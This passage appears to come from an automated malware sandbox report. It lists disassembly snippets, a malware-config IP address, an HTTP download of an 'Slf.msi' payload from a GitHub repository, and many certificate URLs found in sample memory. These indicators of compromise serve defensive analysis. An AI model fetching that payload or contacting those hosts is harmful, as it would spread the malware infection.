                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 4x nop then mov word ptr [ebp+edx*2+00h], si 15_2_20404160
                      Source: C:\Users\user\AppData\Local\Temp\EHttpSrv.exe | Code function: 4x nop then xor dword ptr [edi+eax], ebp 15_2_20403A70

                      Networking

                      Source: Malware configuration extractor | IPs: 185.157.162.126
                      Source: Joe Sandbox View | IP Address: 185.199.108.133
                      Source: Joe Sandbox View | IP Address: 20.233.83.145
                      Source: Joe Sandbox View | ASN Name: OBE-EUROPEObenetworkEuropeSE
                      Source: Joe Sandbox View | JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
                      Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global traffic | HTTP traffic detected: GET /Kroby5444/Jim/raw/refs/heads/main/Slf.msi HTTP/1.1; Connection: Keep-Alive; Accept: */*; User-Agent: Windows Installer; Host: github.com
                      Source: global traffic | HTTP traffic detected: GET /Kroby5444/Jim/refs/heads/main/Slf.msi HTTP/1.1; Connection: Keep-Alive; Accept: */*; User-Agent: Windows Installer; Host: raw.githubusercontent.com
                      Source: global traffic | DNS traffic detected: DNS query: github.com
                      Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
                      Source: EHttpSrv.exe, 00000006.00000002.2336798815.000000006C4C1000.00000020.00000001.01000000.00000008.sdmp, EHttpSrv.exe, 0000000F.00000002.2442489218.000000006C541000.00000020.00000001.01000000.00000008.sdmp, EHttpSrv.exe, 00000018.00000002.2781699116.000000006C951000.00000020.00000001.01000000.00000008.sdmp, EHttpSrv.exe, 0000001D.00000002.2886647949.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, mfc80u.dll.3.drString found in binary or memory: ftp://http://HTTP/1.0
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                      Source: Updwork.exe, Updwork.exe, 00000007.00000002.2473047900.000000000040A000.00000004.00000001.01000000.00000006.sdmp, Updwork.exe, 00000007.00000000.2277511734.000000000040A000.00000008.00000001.01000000.00000006.sdmp, RaftelibeGasrss.exe, 00000016.00000002.2766160302.000000000040A000.00000004.00000001.01000000.0000000D.sdmp, RaftelibeGasrss.exe, 00000016.00000000.2588293176.000000000040A000.00000008.00000001.01000000.0000000D.sdmp, Updwork.exe.3.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
                      Source: Updwork.exe, 00000007.00000002.2473047900.000000000040A000.00000004.00000001.01000000.00000006.sdmp, Updwork.exe, 00000007.00000000.2277511734.000000000040A000.00000008.00000001.01000000.00000006.sdmp, RaftelibeGasrss.exe, 00000016.00000002.2766160302.000000000040A000.00000004.00000001.01000000.0000000D.sdmp, RaftelibeGasrss.exe, 00000016.00000000.2588293176.000000000040A000.00000008.00000001.01000000.0000000D.sdmp, Updwork.exe.3.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmp, MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmp, MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0O
                      Source: MSI3C5A.tmp.3.dr, MSI3C7A.tmp.3.dr, MSI3C2A.tmp.3.dr, MSI3BAC.tmp.3.dr, MSIACD9.tmp.3.dr | String found in binary or memory: http://ocsp.digicert.com0X
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://s2.symcb.com0
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sv.symcb.com/sv.crl0a
                      Source: EHttpSrv.exe, 00000006.00000002.2334264703.00000000023B9000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000008.00000002.2390350139.000000000526B000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000000F.00000002.2441939794.0000000002393000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2755562511.0000000004FED000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000017.00000002.2755799294.000000000257E000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000018.00000002.2781146257.000000000233F000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000019.00000002.2833645210.0000000004B68000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 0000001D.00000002.2886030324.0000000002405000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000001E.00000002.3107534428.0000000004BFA000.00000004.00000800.00020000.00000000.sdmp, EHttpSrv.exe, 00000020.00000002.3108855645.00000000024D0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://sv.symcb.com/sv.crt0
